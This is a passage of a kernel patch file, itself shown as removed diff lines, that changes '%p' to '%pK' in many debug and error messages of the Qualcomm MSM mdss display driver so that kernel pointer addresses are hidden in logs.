--		pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+		pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- 		return -EINVAL;
- 	}
- 
-@@ -358,7 +358,7 @@ int pp_dither_cache_params(struct mdp_dither_cfg_data *config,
- {
- 	int ret = 0;
- 	if (!config || !mdss_pp_res) {
--		pr_err("invalid param config %pi pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, mdss_pp_res);
- 		return -EINVAL;
- 	}
-@@ -387,7 +387,7 @@ static int pp_gamut_cache_params_v1_7(struct mdp_gamut_cfg_data *config,
- 	int ret = 0, i = 0;
- 
- 	if (!config || !mdss_pp_res) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, mdss_pp_res);
- 		return -EINVAL;
- 	}
-@@ -398,7 +398,7 @@ static int pp_gamut_cache_params_v1_7(struct mdp_gamut_cfg_data *config,
- 		return -EINVAL;
- 	}
- 	if (!mdss_pp_res->pp_data_res) {
--		pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+		pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- 		return -EINVAL;
- 	}
- 	res_cache = mdss_pp_res->pp_data_res;
-@@ -555,7 +555,7 @@ int pp_gamut_cache_params(struct mdp_gamut_cfg_data *config,
- {
- 	int ret = 0;
- 	if (!config || !mdss_pp_res) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, mdss_pp_res);
- 		return -EINVAL;
- 	}
-@@ -578,7 +578,7 @@ static int pp_pcc_cache_params_pipe_v1_7(struct mdp_pcc_cfg_data *config,
- 	struct mdp_pcc_data_v1_7 *v17_cache_data = NULL, v17_usr_config;
- 
- 	if (!pipe || !config) {
--		pr_err("invalid params pipe %p config %p\n", pipe, config);
-+		pr_err("invalid params pipe %pK config %pK\n", pipe, config);
- 		return -EINVAL;
- 	}
- 
-@@ -636,7 +636,7 @@ static int pp_pcc_cache_params_v1_7(struct mdp_pcc_cfg_data *config,
- 	struct mdp_pcc_data_v1_7 *v17_cache_data, v17_usr_config;
- 
- 	if (!config || !mdss_pp_res) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, mdss_pp_res);
- 		return -EINVAL;
- 	}
-@@ -647,7 +647,7 @@ static int pp_pcc_cache_params_v1_7(struct mdp_pcc_cfg_data *config,
- 		return -EINVAL;
- 	}
- 	if (!mdss_pp_res->pp_data_res) {
--		pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+		pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- 		return -EINVAL;
- 	}
- 
-@@ -687,7 +687,7 @@ int pp_pcc_cache_params(struct mdp_pcc_cfg_data *config,
- {
- 	int ret = 0;
- 	if (!config || !res_cache) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, res_cache);
- 		return -EINVAL;
- 	}
-@@ -696,7 +696,7 @@ int pp_pcc_cache_params(struct mdp_pcc_cfg_data *config,
- 		return -EINVAL;
- 	}
- 	if (!res_cache->mdss_pp_res && !res_cache->pipe_res) {
--		pr_err("NULL payload for block %d mdss_pp_res %p pipe_res %p\n",
-+		pr_err("NULL payload for block %d mdss_pp_res %pK pipe_res %pK\n",
- 			res_cache->block, res_cache->mdss_pp_res,
- 			res_cache->pipe_res);
- 		return -EINVAL;
-@@ -735,7 +735,7 @@ static int pp_igc_lut_cache_params_v1_7(struct mdp_igc_lut_data *config,
- 	struct mdp_igc_lut_data_v1_7 *v17_cache_data, v17_usr_config;
- 	u32 disp_num;
- 	if (!config || !mdss_pp_res) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, mdss_pp_res);
- 		return -EINVAL;
- 	}
-@@ -745,7 +745,7 @@ static int pp_igc_lut_cache_params_v1_7(struct mdp_igc_lut_data *config,
- 		return -EINVAL;
- 	}
- 	if (!mdss_pp_res->pp_data_res) {
--		pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+		pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- 		return -EINVAL;
- 	}
- 	res_cache = mdss_pp_res->pp_data_res;
-@@ -781,7 +781,7 @@ static int pp_igc_lut_cache_params_v1_7(struct mdp_igc_lut_data *config,
- 		}
- 		if (copy_from_kernel && (!v17_usr_config.c0_c1_data ||
- 		    !v17_usr_config.c2_data)) {
--			pr_err("copy from kernel invalid params c0_c1_data %p c2_data %p\n",
-+			pr_err("copy from kernel invalid params c0_c1_data %pK c2_data %pK\n",
- 				v17_usr_config.c0_c1_data,
- 				v17_usr_config.c2_data);
- 			ret = -EINVAL;
-@@ -837,7 +837,7 @@ static int pp_igc_lut_cache_params_pipe_v1_7(struct mdp_igc_lut_data *config,
- 	struct mdp_igc_lut_data_v1_7 *v17_cache_data = NULL, v17_usr_config;
- 	int ret = 0, fix_up = 0, i = 0;
- 	if (!config || !pipe) {
--		pr_err("invalid param config %p pipe %p\n",
-+		pr_err("invalid param config %pK pipe %pK\n",
- 			config, pipe);
- 		return -EINVAL;
- 	}
-@@ -865,7 +865,7 @@ static int pp_igc_lut_cache_params_pipe_v1_7(struct mdp_igc_lut_data *config,
- 		if (!v17_usr_config.c0_c1_data ||
- 		    !v17_usr_config.c2_data ||
- 		    v17_usr_config.len != IGC_LUT_ENTRIES) {
--			pr_err("invalid c0_c1data %p c2_data %p tbl len %d\n",
-+			pr_err("invalid c0_c1data %pK c2_data %pK tbl len %d\n",
- 					v17_usr_config.c0_c1_data,
- 					v17_usr_config.c2_data,
- 					v17_usr_config.len);
-@@ -959,7 +959,7 @@ int pp_igc_lut_cache_params(struct mdp_igc_lut_data *config,
- {
- 	int ret = 0;
- 	if (!config || !res_cache) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, res_cache);
- 		return -EINVAL;
- 	}
-@@ -968,7 +968,7 @@ int pp_igc_lut_cache_params(struct mdp_igc_lut_data *config,
- 		return -EINVAL;
- 	}
- 	if (!res_cache->mdss_pp_res && !res_cache->pipe_res) {
--		pr_err("NULL payload for block %d mdss_pp_res %p pipe_res %p\n",
-+		pr_err("NULL payload for block %d mdss_pp_res %pK pipe_res %pK\n",
- 			res_cache->block, res_cache->mdss_pp_res,
- 			res_cache->pipe_res);
- 		ret = -EINVAL;
-@@ -1103,7 +1103,7 @@ int pp_pgc_lut_cache_params(struct mdp_pgc_lut_data *config,
- {
- 	int ret = 0;
- 	if (!config || !mdss_pp_res) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, mdss_pp_res);
- 		return -EINVAL;
- 	}
-@@ -1128,7 +1128,7 @@ static int pp_pa_cache_params_v1_7(struct mdp_pa_v2_cfg_data *config,
- 	int disp_num, ret = 0;
- 
- 	if (!config || !mdss_pp_res) {
--		pr_err("Invalid param config %p pp_res %p\n",
-+		pr_err("Invalid param config %pK pp_res %pK\n",
- 			config, mdss_pp_res);
- 		return -EINVAL;
- 	}
-@@ -1140,7 +1140,7 @@ static int pp_pa_cache_params_v1_7(struct mdp_pa_v2_cfg_data *config,
- 	}
- 
- 	if (!mdss_pp_res->pp_data_res) {
--		pr_err("Invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+		pr_err("Invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- 		return -EINVAL;
- 	}
- 
-@@ -1228,7 +1228,7 @@ static int pp_pa_cache_params_pipe_v1_7(struct mdp_pa_v2_cfg_data *config,
- 	int ret = 0;
- 
- 	if (!config || !pipe) {
--		pr_err("Invalid param config %p pipe %p\n",
-+		pr_err("Invalid param config %pK pipe %pK\n",
- 			config, pipe);
- 		return -EINVAL;
- 	}
-@@ -1284,7 +1284,7 @@ int pp_pa_cache_params(struct mdp_pa_v2_cfg_data *config,
- {
- 	int ret = 0;
- 	if (!config || !res_cache) {
--		pr_err("invalid param config %p pp_res %p\n",
-+		pr_err("invalid param config %pK pp_res %pK\n",
- 			config, res_cache);
- 		return -EINVAL;
- 	}
-@@ -1293,7 +1293,7 @@ int pp_pa_cache_params(struct mdp_pa_v2_cfg_data *config,
- 		return -EINVAL;
- 	}
- 	if (!res_cache->mdss_pp_res && !res_cache->pipe_res) {
--		pr_err("NULL payload for block %d mdss_pp_res %p pipe_res %p\n",
-+		pr_err("NULL payload for block %d mdss_pp_res %pK pipe_res %pK\n",
- 			res_cache->block, res_cache->mdss_pp_res,
- 			res_cache->pipe_res);
- 		return -EINVAL;
-@@ -1344,7 +1344,7 @@ int pp_copy_layer_igc_payload(struct mdp_overlay_pp_params *pp_info)
- 				pp_info->igc_cfg.cfg_payload,
- 				sizeof(struct mdp_igc_lut_data_v1_7));
- 		if (ret) {
--			pr_err("layer list copy from user failed, IGC cfg payload = %p\n",
-+			pr_err("layer list copy from user failed, IGC cfg payload = %pK\n",
- 				pp_info->igc_cfg.cfg_payload);
- 			ret = -EFAULT;
- 			kfree(cfg_payload);
-@@ -1382,7 +1382,7 @@ int pp_copy_layer_hist_lut_payload(struct mdp_overlay_pp_params *pp_info)
- 				pp_info->hist_lut_cfg.cfg_payload,
- 				sizeof(struct mdp_hist_lut_data_v1_7));
- 		if (ret) {
--			pr_err("layer list copy from user failed, Hist LUT cfg payload = %p\n",
-+			pr_err("layer list copy from user failed, Hist LUT cfg payload = %pK\n",
- 				pp_info->hist_lut_cfg.cfg_payload);
- 			ret = -EFAULT;
- 			kfree(cfg_payload);
-@@ -1420,7 +1420,7 @@ int pp_copy_layer_pa_payload(struct mdp_overlay_pp_params *pp_info)
- 				pp_info->pa_v2_cfg_data.cfg_payload,
- 				sizeof(struct mdp_pa_data_v1_7));
- 		if (ret) {
--			pr_err("layer list copy from user failed, PA cfg payload = %p\n",
-+			pr_err("layer list copy from user failed, PA cfg payload = %pK\n",
- 				pp_info->pa_v2_cfg_data.cfg_payload);
- 			ret = -EFAULT;
- 			kfree(cfg_payload);
-@@ -1458,7 +1458,7 @@ int pp_copy_layer_pcc_payload(struct mdp_overlay_pp_params *pp_info)
- 				pp_info->pcc_cfg_data.cfg_payload,
- 				sizeof(struct mdp_pcc_data_v1_7));
- 		if (ret) {
--			pr_err("layer list copy from user failed, PCC cfg payload = %p\n",
-+			pr_err("layer list copy from user failed, PCC cfg payload = %pK\n",
- 				pp_info->pcc_cfg_data.cfg_payload);
- 			ret = -EFAULT;
- 			kfree(cfg_payload);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c b/drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c
-index fe88fe6..bc19b5b 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c
-@@ -245,7 +245,7 @@ static void pp_gamut_clock_gating_en(char __iomem *base_addr);
- void *pp_get_driver_ops(struct mdp_pp_driver_ops *ops)
- {
- 	if (!ops) {
--		pr_err("PP driver ops invalid %p\n", ops);
-+		pr_err("PP driver ops invalid %pK\n", ops);
- 		return ERR_PTR(-EINVAL);
- 	}
- 
-@@ -307,7 +307,7 @@ static void pp_opmode_config(int location, struct pp_sts_type *pp_sts,
- 		u32 *opmode, int side)
- {
- 	if (!pp_sts || !opmode) {
--		pr_err("Invalid pp_sts %p or opmode %p\n", pp_sts, opmode);
-+		pr_err("Invalid pp_sts %pK or opmode %pK\n", pp_sts, opmode);
- 		return;
- 	}
- 	switch (location) {
-@@ -361,7 +361,7 @@ static int pp_hist_lut_get_config(char __iomem *base_addr, void *cfg_data,
- 	struct mdp_hist_lut_data *lut_cfg_data = NULL;
- 
- 	if (!base_addr || !cfg_data) {
--		pr_err("invalid params base_addr %p cfg_data %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK\n",
- 		       base_addr, cfg_data);
- 		return -EINVAL;
- 	}
-@@ -373,7 +373,7 @@ static int pp_hist_lut_get_config(char __iomem *base_addr, void *cfg_data,
- 	}
- 	if (lut_cfg_data->version != mdp_hist_lut_v1_7 ||
- 		!lut_cfg_data->cfg_payload) {
--		pr_err("invalid hist_lut version %d payload %p\n",
-+		pr_err("invalid hist_lut version %d payload %pK\n",
- 		       lut_cfg_data->version, lut_cfg_data->cfg_payload);
- 		return -EINVAL;
- 	}
-@@ -438,7 +438,7 @@ static int pp_hist_lut_set_config(char __iomem *base_addr,
- 	char __iomem *hist_addr = NULL, *swap_addr = NULL;
- 
- 	if (!base_addr || !cfg_data || !pp_sts) {
--		pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- 		      base_addr, cfg_data, pp_sts);
- 		return -EINVAL;
- 	}
-@@ -464,12 +464,12 @@ static int pp_hist_lut_set_config(char __iomem *base_addr,
- 	}
- 	lut_data = lut_cfg_data->cfg_payload;
- 	if (!lut_data) {
--		pr_err("invalid hist_lut cfg_payload %p\n", lut_data);
-+		pr_err("invalid hist_lut cfg_payload %pK\n", lut_data);
- 		return -EINVAL;
- 	}
- 
- 	if (lut_data->len != ENHIST_LUT_ENTRIES || !lut_data->data) {
--		pr_err("invalid hist_lut len %d data %p\n",
-+		pr_err("invalid hist_lut len %d data %pK\n",
- 		       lut_data->len, lut_data->data);
- 		return -EINVAL;
- 	}
-@@ -533,7 +533,7 @@ static int pp_dither_set_config(char __iomem *base_addr,
- 	uint32_t *pdata = NULL;
- 
- 	if (!base_addr || !cfg_data || !pp_sts) {
--		pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- 		      base_addr, cfg_data, pp_sts);
- 		return -EINVAL;
- 	}
-@@ -560,7 +560,7 @@ static int pp_dither_set_config(char __iomem *base_addr,
- 
- 	dither_data = dither_cfg_data->cfg_payload;
- 	if (!dither_data) {
--		pr_err("invalid payload for dither %p\n", dither_data);
-+		pr_err("invalid payload for dither %pK\n", dither_data);
- 		return -EINVAL;
- 	}
- 
-@@ -608,7 +608,7 @@ static int pp_hist_get_config(char __iomem *base_addr, void *cfg_data,
- 	struct pp_hist_col_info *hist_info = NULL;
- 
- 	if (!base_addr || !cfg_data) {
--		pr_err("invalid params base_addr %p cfg_data %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK\n",
- 		       base_addr, cfg_data);
- 		return -EINVAL;
- 	}
-@@ -646,7 +646,7 @@ static int pp_get_hist_offset(u32 block, u32 *ctl_off)
- 	int ret = 0;
- 
- 	if (!ctl_off) {
--		pr_err("invalid params ctl_off %p\n", ctl_off);
-+		pr_err("invalid params ctl_off %pK\n", ctl_off);
- 		return -EINVAL;
- 	}
- 	switch (block) {
-@@ -667,7 +667,7 @@ static int pp_get_hist_offset(u32 block, u32 *ctl_off)
- static int pp_get_hist_isr(u32 *isr_mask)
- {
- 	if (!isr_mask) {
--		pr_err("invalid params isr_mask %p\n", isr_mask);
-+		pr_err("invalid params isr_mask %pK\n", isr_mask);
- 		return -EINVAL;
- 	}
- 
-@@ -693,7 +693,7 @@ static int pp_gamut_get_config(char __iomem *base_addr, void *cfg_data,
- 	u32 clk_gate_disable = 0;
- 
- 	if (!base_addr || !cfg_data) {
--		pr_err("invalid params base_addr %p cfg_data %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK\n",
- 		       base_addr, cfg_data);
- 		return -EINVAL;
- 	}
-@@ -831,7 +831,7 @@ static int pp_gamut_set_config(char __iomem *base_addr,
- 	struct mdp_gamut_data_v1_7 *gamut_data = NULL;
- 	char __iomem *base_addr_scale = base_addr;
- 	if (!base_addr || !cfg_data || !pp_sts) {
--		pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- 		      base_addr, cfg_data, pp_sts);
- 		return -EINVAL;
- 	}
-@@ -853,7 +853,7 @@ static int pp_gamut_set_config(char __iomem *base_addr,
- 	gamut_data = (struct mdp_gamut_data_v1_7 *)
- 		      gamut_cfg_data->cfg_payload;
- 	if (!gamut_data) {
--		pr_err("invalid payload for gamut %p\n", gamut_data);
-+		pr_err("invalid payload for gamut %pK\n", gamut_data);
- 		return -EINVAL;
- 	}
- 
-@@ -872,7 +872,7 @@ static int pp_gamut_set_config(char __iomem *base_addr,
- 	for (i = 0; i < MDP_GAMUT_TABLE_NUM_V1_7; i++) {
- 		if (!gamut_data->c0_data[i] || !gamut_data->c1_c2_data[i]
- 		    || (gamut_data->tbl_size[i] != tbl_sz)) {
--			pr_err("invalid param for c0 %p c1c2 %p table %d size %d expected sz %d\n",
-+			pr_err("invalid param for c0 %pK c1c2 %pK table %d size %d expected sz %d\n",
- 			       gamut_data->c0_data[i],
- 			       gamut_data->c1_c2_data[i], i,
- 			       gamut_data->tbl_size[i], tbl_sz);
-@@ -883,7 +883,7 @@ static int pp_gamut_set_config(char __iomem *base_addr,
- 		    (!gamut_data->scale_off_data[i] ||
- 		    (gamut_data->tbl_scale_off_sz[i] !=
- 		    MDP_GAMUT_SCALE_OFF_SZ))) {
--			pr_err("invalid param for scale table %p for c%d size %d expected size%d\n",
-+			pr_err("invalid param for scale table %pK for c%d size %d expected size%d\n",
- 				gamut_data->scale_off_data[i], i,
- 				gamut_data->tbl_scale_off_sz[i],
- 				MDP_GAMUT_SCALE_OFF_SZ);
-@@ -948,7 +948,7 @@ static int pp_pcc_set_config(char __iomem *base_addr,
- 	u32 opmode = 0;
- 
- 	if (!base_addr || !cfg_data || !pp_sts) {
--		pr_err("invalid params base_addr %p cfg_data %p pp_sts %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK pp_sts %pK\n",
- 			base_addr, cfg_data, pp_sts);
- 		return -EINVAL;
- 	}
-@@ -963,7 +963,7 @@ static int pp_pcc_set_config(char __iomem *base_addr,
- 	}
- 	pcc_data = pcc_cfg_data->cfg_payload;
- 	if (!pcc_data) {
--		pr_err("invalid payload for pcc %p\n", pcc_data);
-+		pr_err("invalid payload for pcc %pK\n", pcc_data);
- 		return -EINVAL;
- 	}
- 
-@@ -1033,7 +1033,7 @@ static int pp_pcc_get_config(char __iomem *base_addr, void *cfg_data,
- 	struct mdp_pcc_data_v1_7 pcc_data;
- 
- 	if (!base_addr || !cfg_data) {
--		pr_err("invalid params base_addr %p cfg_data %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK\n",
- 		       base_addr, cfg_data);
- 		return -EINVAL;
- 	}
-@@ -1230,7 +1230,7 @@ static void pp_pa_set_six_zone(char __iomem *base_addr,
- 
- 	if (!pa_data->six_zone_len || !pa_data->six_zone_curve_p0 ||
- 	    !pa_data->six_zone_curve_p1) {
--		pr_err("Invalid six zone data: len %d curve_p0 %p curve_p1 %p\n",
-+		pr_err("Invalid six zone data: len %d curve_p0 %pK curve_p1 %pK\n",
- 		       pa_data->six_zone_len,
- 		       pa_data->six_zone_curve_p0,
- 		       pa_data->six_zone_curve_p1);
-@@ -1348,7 +1348,7 @@ static int pp_pa_set_config(char __iomem *base_addr,
- 	int ret = 0;
- 
- 	if (!base_addr || !cfg_data || !pp_sts) {
--		pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- 		      base_addr, cfg_data, pp_sts);
- 		return -EINVAL;
- 	}
-@@ -1373,7 +1373,7 @@ static int pp_pa_set_config(char __iomem *base_addr,
- 
- 	pa_data = pa_cfg_data->cfg_payload;
- 	if (!pa_data) {
--		pr_err("invalid payload for pa %p\n", pa_data);
-+		pr_err("invalid payload for pa %pK\n", pa_data);
- 		return -EINVAL;
- 	}
- 
-@@ -1622,7 +1622,7 @@ static int pp_pa_get_config(char __iomem *base_addr, void *cfg_data,
- 	char __iomem *pa_hold_addr = NULL;
- 
- 	if (!base_addr || !cfg_data) {
--		pr_err("invalid params base_addr %p cfg_data %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK\n",
- 		      base_addr, cfg_data);
- 		return -EINVAL;
- 	}
-@@ -1755,7 +1755,7 @@ static int pp_igc_set_config(char __iomem *base_addr,
- 	u32 data;
- 
- 	if (!base_addr || !cfg_data || !pp_sts) {
--		pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- 		      base_addr, cfg_data, pp_sts);
- 		return -EINVAL;
- 	}
-@@ -1763,7 +1763,7 @@ static int pp_igc_set_config(char __iomem *base_addr,
- 	lut_cfg_data = (struct mdp_igc_lut_data *) cfg_data;
- 	if (lut_cfg_data->version != mdp_igc_v1_7 ||
- 	    !lut_cfg_data->cfg_payload) {
--		pr_err("invalid igc version %d payload %p\n",
-+		pr_err("invalid igc version %d payload %pK\n",
- 		       lut_cfg_data->version, lut_cfg_data->cfg_payload);
- 		return -EINVAL;
- 	}
-@@ -1782,7 +1782,7 @@ static int pp_igc_set_config(char __iomem *base_addr,
- 	lut_data = lut_cfg_data->cfg_payload;
- 	if (lut_data->len != IGC_LUT_ENTRIES || !lut_data->c0_c1_data ||
- 	    !lut_data->c2_data) {
--		pr_err("invalid lut len %d c0_c1_data %p  c2_data %p\n",
-+		pr_err("invalid lut len %d c0_c1_data %pK  c2_data %pK\n",
- 		       lut_data->len, lut_data->c0_c1_data, lut_data->c2_data);
- 		return -EINVAL;
- 	}
-@@ -1849,7 +1849,7 @@ static int pp_igc_get_config(char __iomem *base_addr, void *cfg_data,
- 	u32 data = 0, sz = 0;
- 
- 	if (!base_addr || !cfg_data || block_type != DSPP) {
--		pr_err("invalid params base_addr %p cfg_data %p block_type %d\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK block_type %d\n",
- 		      base_addr, cfg_data, block_type);
- 		return -EINVAL;
- 	}
-@@ -1861,7 +1861,7 @@ static int pp_igc_get_config(char __iomem *base_addr, void *cfg_data,
- 	if (lut_cfg_data->version != mdp_igc_v1_7 ||
- 	    !lut_cfg_data->cfg_payload ||
- 	    lut_cfg_data->block > IGC_MASK_MAX) {
--		pr_err("invalid igc version %d payload %p block %d\n",
-+		pr_err("invalid igc version %d payload %pK block %d\n",
- 		       lut_cfg_data->version, lut_cfg_data->cfg_payload,
- 		       lut_cfg_data->block);
- 		ret = -EINVAL;
-@@ -1926,7 +1926,7 @@ static int pp_pgc_set_config(char __iomem *base_addr,
- 	struct mdp_pgc_lut_data_v1_7  *pgc_data_v17 = NULL;
- 
- 	if (!base_addr || !cfg_data || !pp_sts) {
--		pr_err("invalid params base_addr %p cfg_data %p pp_sts_type %p\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK pp_sts_type %pK\n",
- 		      base_addr, cfg_data, pp_sts);
- 		return -EINVAL;
- 	}
-@@ -1952,13 +1952,13 @@ static int pp_pgc_set_config(char __iomem *base_addr,
- 
- 	pgc_data_v17 = (struct mdp_pgc_lut_data_v1_7 *) pgc_data->cfg_payload;
- 	if (!pgc_data_v17) {
--		pr_err("invalid payload for GC %p\n", pgc_data_v17);
-+		pr_err("invalid payload for GC %pK\n", pgc_data_v17);
- 		return -EINVAL;
- 	}
- 
- 	if (pgc_data_v17->len != PGC_LUT_ENTRIES || !pgc_data_v17->c0_data ||
- 	    !pgc_data_v17->c1_data || !pgc_data_v17->c2_data) {
--		pr_err("Invalid params entries %d c0_data %p c1_data %p c2_data %p\n",
-+		pr_err("Invalid params entries %d c0_data %pK c1_data %pK c2_data %pK\n",
- 			pgc_data_v17->len, pgc_data_v17->c0_data,
- 			pgc_data_v17->c1_data, pgc_data_v17->c2_data);
- 		return -EINVAL;
-@@ -2011,7 +2011,7 @@ static int pp_pgc_get_config(char __iomem *base_addr, void *cfg_data,
- 	struct mdp_pgc_lut_data *pgc_data = NULL;
- 	struct mdp_pgc_lut_data_v1_7  *pgc_data_v17 = NULL;
- 	if (!base_addr || !cfg_data) {
--		pr_err("invalid params base_addr %p cfg_data %p block_type %d\n",
-+		pr_err("invalid params base_addr %pK cfg_data %pK block_type %d\n",
- 		      base_addr, cfg_data, block_type);
- 		return -EINVAL;
- 	}
-@@ -2019,7 +2019,7 @@ static int pp_pgc_get_config(char __iomem *base_addr, void *cfg_data,
- 	pgc_data_v17 = (struct mdp_pgc_lut_data_v1_7 *)
- 			pgc_data->cfg_payload;
- 	if (pgc_data->version != mdp_pgc_v1_7 || !pgc_data_v17) {
--		pr_err("invalid pgc version %d payload %p\n",
-+		pr_err("invalid pgc version %d payload %pK\n",
- 			pgc_data->version, pgc_data_v17);
- 		return -EINVAL;
- 	}
-@@ -2081,7 +2081,7 @@ static int pp_pgc_get_config(char __iomem *base_addr, void *cfg_data,
- static int pp_pcc_get_version(u32 *version)
- {
- 	if (!version) {
--		pr_err("invalid param version %p\n", version);
-+		pr_err("invalid param version %pK\n", version);
- 		return -EINVAL;
- 	}
- 	*version = mdp_pcc_v1_7;
-@@ -2091,7 +2091,7 @@ static int pp_pcc_get_version(u32 *version)
- static int pp_igc_get_version(u32 *version)
- {
- 	if (!version) {
--		pr_err("invalid param version %p\n", version);
-+		pr_err("invalid param version %pK\n", version);
- 		return -EINVAL;
- 	}
- 	*version = mdp_igc_v1_7;
-@@ -2101,7 +2101,7 @@ static int pp_igc_get_version(u32 *version)
- static int pp_pgc_get_version(u32 *version)
- {
- 	if (!version) {
--		pr_err("invalid param version %p\n", version);
-+		pr_err("invalid param version %pK\n", version);
- 		return -EINVAL;
- 	}
- 	*version = mdp_pgc_v1_7;
-@@ -2111,7 +2111,7 @@ static int pp_pgc_get_version(u32 *version)
- static int pp_pa_get_version(u32 *version)
- {
- 	if (!version) {
--		pr_err("invalid param version %p\n", version);
-+		pr_err("invalid param version %pK\n", version);
- 		return -EINVAL;
- 	}
- 	*version = mdp_pa_v1_7;
-@@ -2121,7 +2121,7 @@ static int pp_pa_get_version(u32 *version)
- static int pp_gamut_get_version(u32 *version)
- {
- 	if (!version) {
--		pr_err("invalid param version %p\n", version);
-+		pr_err("invalid param version %pK\n", version);
- 		return -EINVAL;
- 	}
- 	*version = mdp_gamut_v1_7;
-@@ -2131,7 +2131,7 @@ static int pp_gamut_get_version(u32 *version)
- static int pp_dither_get_version(u32 *version)
- {
- 	if (!version) {
--		pr_err("invalid param version %p\n", version);
-+		pr_err("invalid param version %pK\n", version);
- 		return -EINVAL;
- 	}
- 	*version = mdp_dither_v1_7;
-@@ -2141,7 +2141,7 @@ static int pp_dither_get_version(u32 *version)
- static int pp_hist_lut_get_version(u32 *version)
- {
- 	if (!version) {
--		pr_err("invalid param version %p\n", version);
-+		pr_err("invalid param version %pK\n", version);
- 		return -EINVAL;
- 	}
- 	*version = mdp_hist_lut_v1_7;
-diff --git a/drivers/video/msm/mdss/mdss_mdp_rotator.c b/drivers/video/msm/mdss/mdss_mdp_rotator.c
-index ac957a0..e5307da 100644
---- a/drivers/video/msm/mdss/mdss_mdp_rotator.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_rotator.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -190,11 +190,11 @@ static struct mdss_mdp_rot_pipe *mdss_mdp_rot_mgr_acquire_pipe(
- 			(free_rot_pipe->previous_session != rot);
- 
- 		rot_pipe = free_rot_pipe;
--		pr_debug("find a free pipe %p\n", rot_pipe->pipe);
-+		pr_debug("find a free pipe %pK\n", rot_pipe->pipe);
- 	} else {
- 		rot_pipe = busy_rot_pipe;
- 		if (rot_pipe)
--			pr_debug("find a busy pipe %p\n", rot_pipe->pipe);
-+			pr_debug("find a busy pipe %pK\n", rot_pipe->pipe);
- 	}
- 
- 	if (rot_pipe)
-diff --git a/drivers/video/msm/mdss/mdss_mdp_util.c b/drivers/video/msm/mdss/mdss_mdp_util.c
-index fba7c86..af4920c 100644
---- a/drivers/video/msm/mdss/mdss_mdp_util.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_util.c
-@@ -1052,7 +1052,7 @@ static int mdss_mdp_put_img(struct mdss_mdp_img_data *data, bool rotator,
- 		pr_debug("pmem buf=0x%pa\n", &data->addr);
- 		memset(&data->srcp_f, 0, sizeof(struct fd));
- 	} else if (!IS_ERR_OR_NULL(data->srcp_dma_buf)) {
--		pr_debug("ion hdl=%p buf=0x%pa\n", data->srcp_dma_buf,
-+		pr_debug("ion hdl=%pK buf=0x%pa\n", data->srcp_dma_buf,
- 							&data->addr);
- 		if (!iclient) {
- 			pr_err("invalid ion client\n");
-@@ -1211,8 +1211,9 @@ static int mdss_mdp_get_img(struct msmfb_data *img,
- 		data->addr += data->offset;
- 		data->len -= data->offset;
- 
--		pr_debug("mem=%d ihdl=%p buf=0x%pa len=0x%lx\n", img->memory_id,
--			 data->srcp_dma_buf, &data->addr, data->len);
-+		pr_debug("mem=%d ihdl=%pK buf=0x%pa len=0x%lx\n",
-+			 img->memory_id, data->srcp_dma_buf,
-+			 &data->addr, data->len);
- 	} else {
- 		mdss_mdp_put_img(data, rotator, dir);
- 		return ret ? : -EOVERFLOW;
-@@ -1267,7 +1268,7 @@ static int mdss_mdp_map_buffer(struct mdss_mdp_img_data *data, bool rotator,
- 		data->addr += data->offset;
- 		data->len -= data->offset;
- 
